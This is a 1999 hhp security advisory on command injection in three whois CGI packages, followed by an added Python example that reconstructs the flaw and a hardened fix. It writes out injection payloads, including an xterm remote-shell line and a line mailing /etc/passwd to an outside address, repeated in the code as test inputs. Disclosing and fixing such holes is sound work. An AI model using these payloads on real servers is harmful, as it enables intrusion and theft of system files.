Subject: Whois.cgi - ADVISORY.
From: Cody T. - hhp (hhp at HHP.PERLX.COM)
Date: Tue Nov 09 1999 - 20:51:58 CST
(hhp) Whois.CGI - ADVISORY. (hhp)
hhp-ADV#12
11/9/99 8:42:57pm CST
By: loophole
hhp
hhp.perlx.com - http://hhp.perlx.com
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
What?:
Command injection hole in several known (and
probably unknown) Whois CGI packages.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Versions?:
1.) Whois Internic Lookup - version: 1.0
2.) CC Whois - Version: 1.0
3.) Matt's Whois - Version: 1
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Exploit!:
These versions allow execution of arbitrary
commands on the web server: the submitted
domain is handed to a shell without any
filtering of shell metacharacters, so a
domain entry containing one of the following
strings terminates the whois command and
starts a new one...
Note: (The exact string varies between the
vulnerable versions, depending on how each
script quotes the argument.)
1.) ;commands
2.) ";commands
3.) ;commands;
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Example!:
If the domain entry consists of:
1.) ;id
2.) ";id
or
3.) ;id;
you will see something like this:
'Whois Server Version 1.1
Domain names in the .com, .net, and .org
domains can now be registered with many
different competing registrars. Go to
http://www.internic.net for detailed
information. etc. etc. etc....
(scroll to the bottom of the output)
uid=501(blah) gid=500(blah)'
^^^^^^^^^^^^^^^^^^^^^^^^^^
`- 'id' was executed on the server, as the
web server's user.
Other commands can be run the same way, e.g.:
;xterm -display ip:0.0 -rv -e /bin/sh
";uname -a;whoami;w;ls -al
;cat /etc/passwd|mail you@yourdomain.com;
Etc, Etc.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Foo!:
A lot of main *NIC* servers were found
running vulnerable versions. I am in the
process of contacting the main servers
and the software programmers to advise them
of the vulnerability.
Very well known/used sites are
vulnerable (which will remain nameless for
security reasons). I tried to get in
contact with them, but being such a big
company/service, I failed; so sad indeed.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Fix?:
If you run one of these bad scripts,
delete it and point your browser to:
http://cgi.resourceindex.com/Programs_and_Scripts/Perl/Internet_Utilities/Whois/
and download one of the secure packages.
Whichever package you pick, check that it
never hands the submitted domain to a shell
(no backticks, no system() with a single
string) and that it rejects anything but
hostname characters before running whois.
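As an added illustration (not code from this advisory or from any of the three packages named above; their Perl sources are not on this page), the following Python reconstructs the vulnerable pattern, a CGI that builds the string `whois DOMAIN` for /bin/sh, shows how the shell splits the advisory's payloads into a second command, and gives the hardened replacement: strict hostname validation plus an argv call with no shell in between. The `whois DOMAIN` template and the function names are assumptions for the example; the `";id` variant is not exercised because it only works against a script that quotes the argument in a particular way, and on its own it is an unbalanced quote.

```python
"""Shell metacharacter injection in a whois CGI, and a fix.

Added example, not code from the advisory or from any package it names.
The vulnerable pattern is a reconstruction of the 1999 CGI style: the
submitted domain is dropped into a command string that /bin/sh parses.
"""
import re
import shlex
import subprocess


def vulnerable_command_line(domain):
    """What the vulnerable scripts did (template is an assumption):
    build `whois DOMAIN` as one string and run it through a shell, so
    the shell, not whois, gets to interpret the user's input."""
    return "whois " + domain


def shell_commands(cmdline):
    """Tokenise `cmdline` the way a POSIX shell would and split it into
    the separate commands the shell runs: `;` ends one command and
    starts the next.  Only `;` is treated as a separator here; `|` and
    `&` stay as tokens inside a command so they remain visible."""
    lex = shlex.shlex(cmdline, posix=True, punctuation_chars=True)
    lex.whitespace_split = True          # split at whitespace and ;|&
    commands, current = [], []
    for tok in lex:
        if tok == ";":
            if current:
                commands.append(current)
            current = []
        else:
            current.append(tok)
    if current:
        commands.append(current)
    return commands


# Hostname syntax only: labels of letters, digits and interior hyphens,
# a dotted hierarchy, alphabetic TLD.  No `;`, quotes, spaces, `|`, `$`
# or a leading `-` (which would also stop option injection into whois).
_LABEL = r"[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?"
_DOMAIN_RE = re.compile(r"^(?:%s\.)+[a-z]{2,63}$" % _LABEL, re.IGNORECASE)


def is_valid_domain(domain):
    """Allow-list check: True only for a syntactically valid hostname."""
    return len(domain) <= 253 and _DOMAIN_RE.match(domain) is not None


def safe_argv(domain):
    """Hardened form: validate first, then build an argument vector.
    The domain is one argv element; nothing in it can ever become a
    separate command because no shell parses it."""
    if not is_valid_domain(domain):
        raise ValueError("rejected domain: %r" % domain)
    return ["whois", domain]


def safe_lookup(domain, timeout=20):
    """Run the hardened lookup (needs a whois binary and the network,
    so it is not exercised offline)."""
    proc = subprocess.run(safe_argv(domain), capture_output=True,
                          text=True, timeout=timeout)
    return proc.stdout


if __name__ == "__main__":
    # Payloads taken from the advisory; the domain is constructed.
    for entry in ["example.com", ";id", ";id;",
                  ";xterm -display ip:0.0 -rv -e /bin/sh",
                  ";cat /etc/passwd|mail you@yourdomain.com;"]:
        line = vulnerable_command_line(entry)
        print("%-45r -> %s" % (line, shell_commands(line)))
        try:
            print("    hardened argv:", safe_argv(entry))
        except ValueError as exc:
            print("    hardened:", exc)
```

Running the block prints, for each entry, the command string the vulnerable script would build and the list of commands the shell would actually execute; every entry after the first shows `['id']` (or the xterm/cat command) as a second command, while the hardened path accepts only `example.com`.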
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Shouts to all of hhp.
Fuck you to gH for trying to rip this ADV
before I could release it.
---hhp-2t0--------------------------------